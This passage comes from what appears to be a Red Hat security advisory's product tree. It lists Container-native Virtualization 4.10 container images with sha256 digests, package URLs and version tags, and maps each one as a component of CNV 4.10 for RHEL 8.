"container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", product_identification_helper: { purl: "pkg:oci/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-webhook-rhel8&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", product: { name: "container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", product_id: "container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", product_identification_helper: { purl: "pkg:oci/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubemacpool&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", product: { name: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", product_id: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", product_identification_helper: { purl: "pkg:oci/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubernetes-nmstate-handler-rhel8&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", product: { name: "container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", product_id: "container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-ssp-operator&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", product: { name: "container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", product_id: "container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-template-validator&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", product: { name: "container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", product_id: "container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", product_identification_helper: { purl: "pkg:oci/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/libguestfs-tools&tag=v4.10.5-3", }, }, }, { category: "product_version", name: "container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", product: { name: "container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", product_id: "container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", product_identification_helper: { purl: "pkg:oci/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/node-maintenance-operator&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", product: { name: "container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", product_id: "container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", product_identification_helper: { purl: "pkg:oci/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-marker&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", product: { name: "container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", product_id: "container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", product_identification_helper: { purl: "pkg:oci/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-plugin&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", product: { name: "container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", product_id: "container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", product_identification_helper: { purl: "pkg:oci/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-api&tag=v4.10.5-3", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", product: { name: "container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", product_id: "container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", product_identification_helper: { purl: "pkg:oci/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-artifacts-server&tag=v4.10.5-3", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", product: { name: "container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", product_id: "container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-apiserver&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", product: { name: "container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", product_id: "container-native-virtualization/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-cloner@sha256:1a711f5dab75eda9cdbe5ac6ff1342c6330706fe8557a2ec299c8f4a43596010?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-cloner&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", product: { name: "container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", product_id: "container-native-virtualization/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-controller@sha256:99bf5c60487721a8e74d599340ebf0b7e95f6c63cc448b5830a6c83cfaffd483?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-controller&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", product: { name: "container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", product_id: "container-native-virtualization/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-importer@sha256:79d039930f4f35c5d2914c4bed01122908f6e85db067991f9a8b0e980f1ec3c2?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-importer&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", product: { name: "container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", product_id: "container-native-virtualization/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-operator@sha256:f9323c2acac8590a85f8bedf153429050d70ff489e36150e5c5c869f18a5fd9f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-operator&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", product: { name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", product_id: "container-native-virtualization/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-uploadproxy@sha256:f80cad318b7cb741e307e37213672daf69fa002a755c8104dae8991ceccf91cf?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadproxy&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", product: { name: "container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", product_id: "container-native-virtualization/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-uploadserver@sha256:feff5a9f107ed78db14a2853bb7f7dd483cc452656f302c4570cd284c066b26f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadserver&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", product: { name: "container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", product_id: "container-native-virtualization/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0_amd64", product_identification_helper: { purl: "pkg:oci/virt-controller@sha256:8c521ba917f130b2d31583c10ebdd0507a3edf2952b42c6656d10e83fd06fcd0?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-controller&tag=v4.10.5-3", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", product: { name: "container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", product_id: "container-native-virtualization/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1_amd64", product_identification_helper: { purl: "pkg:oci/virt-handler@sha256:4642e3f972381d351cc69e44754d072fcd562fd014b265f5ca46dafaca28e8d1?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-handler&tag=v4.10.5-3", }, }, }, { category: "product_version", name: "container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", product: { name: "container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", product_id: "container-native-virtualization/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83_amd64", product_identification_helper: { purl: "pkg:oci/virtio-win@sha256:8493aa2e1f3b20d282c493ac856e4a7a9367e1283854f7ff4e72256029ba2f83?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virtio-win&tag=v4.10.5-1", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", product: { name: "container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", product_id: "container-native-virtualization/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3_amd64", product_identification_helper: { purl: "pkg:oci/virt-launcher@sha256:55cf51d28cc9c4c74835af5e99fbbf1f9bf641cfa8543a36fde70b42704f1fa3?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-launcher&tag=v4.10.5-3", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", product: { name: "container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", product_id: "container-native-virtualization/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0_amd64", product_identification_helper: { purl: "pkg:oci/virt-operator@sha256:f6ece3128372a3e9ef34dcdf0d5e2eb74d91c084d1f470cfad26c6a0695f5fd0?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-operator&tag=v4.10.5-3", }, }, }, ], category: "architecture", name: "amd64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", }, product_reference: "container-native-virtualization/bridge-marker@sha256:02744203e145e4e8567c2a00985e81b298fc5a484184556abf1633d2e27b372d_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", }, product_reference: "container-native-virtualization/cluster-network-addons-operator@sha256:b90c9a33a1f83285a719d8f51100d1b11fc72f94e3075887c7277872afc6eb29_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", }, product_reference: "container-native-virtualization/cnv-containernetworking-plugins@sha256:9307e740b2ce835111d8646355869f3012a45f0cc815ebcaf60f7dead79ffacd_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", }, product_reference: "container-native-virtualization/cnv-must-gather-rhel8@sha256:c97220b06af03592f4a5ea4a97c2276b426265ec104ba3520ab160af52bbc435_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", }, product_reference: "container-native-virtualization/hco-bundle-registry@sha256:78d29f077193ab9b98bbc7a1d53f1cf6af69a8261d76aa2d3a2c279e34161c3c_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", }, product_reference: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", }, product_reference: "container-native-virtualization/hostpath-csi-driver@sha256:69b4ca22244c2ca6a52202c611d7daad1e74ebecd3ecd3949c085ff79f2d337f_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", }, product_reference: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:590627bece9f03898f3ef0861d2703b3a789846f94a6dc94399a93249b64289a_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", }, product_reference: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:546728294abfb9b1ae6083d6139fa4342d8f45abbe38477cba52954fa8bae6b4_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", }, product_reference: "container-native-virtualization/hyperconverged-cluster-operator@sha256:22f41f92046a55690dc8c81524a7bd9327642db5ac3a540af288bd2123b6b4aa_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", }, product_reference: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:01d865cc22ddda181d998514410e5ee31ea4a526431896fc39b589b4cc1fc648_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", }, product_reference: "container-native-virtualization/kubemacpool@sha256:7e1c08d57170233e2a5f19ca3c856f9baedde40dd870bf51cbfdb8865be35730_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", }, product_reference: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:6359ca59482a1e2c09588c0f8cfced6ef54ad901c50dd12ae016a380d56eb4f9_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", }, product_reference: "container-native-virtualization/kubevirt-ssp-operator@sha256:8507dd318e6892dfc3ac03ec3fcfa9e81fa62d6c8492d115035c01613b96a38f_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", }, product_reference: "container-native-virtualization/kubevirt-template-validator@sha256:82513d5df8e10848cc8cf161ff4618f0a114b86031e81540b7aeb41e8c4688fa_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", }, product_reference: "container-native-virtualization/libguestfs-tools@sha256:f88b80e220c04bb336ed190fe18baf2edc5be6144310777f641c9f356d146198_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", }, product_reference: "container-native-virtualization/node-maintenance-operator@sha256:cf2ed2cb61d31bf36c4b8a11650df58787b149d183495058f2a88c78c66a7af9_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", }, product_reference: "container-native-virtualization/ovs-cni-marker@sha256:e9ea5876fd86fa01bd6f24724a17460c6f4a24fc725a4e6fb6a280985c523435_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", }, product_reference: "container-native-virtualization/ovs-cni-plugin@sha256:9d21940627bd9b73ec06654afc65f697d0691c4a00764772b7907264723662f3_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", }, product_reference: "container-native-virtualization/virt-api@sha256:1ad260258c8133653f2bc73fbf2f5ea05867e5bb667dcdd0adfc78e6534148c1_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", }, product_reference: "container-native-virtualization/virt-artifacts-server@sha256:e27100e86195cd7174b77deff6216a7f373ef0335c9052d3f660fc8b14138f90_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64 as a component of CNV 4.10 for RHEL 8", product_id: "8Base-CNV-4.10:container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", }, product_reference: "container-native-virtualization/virt-cdi-apiserver@sha256:1727b8ff9a5326acfc5c961c580eac8510090147eac20d1aded5ce9956e514e8_amd64", relates_to_product_reference: "8Base-CNV-4.10", }, { category: 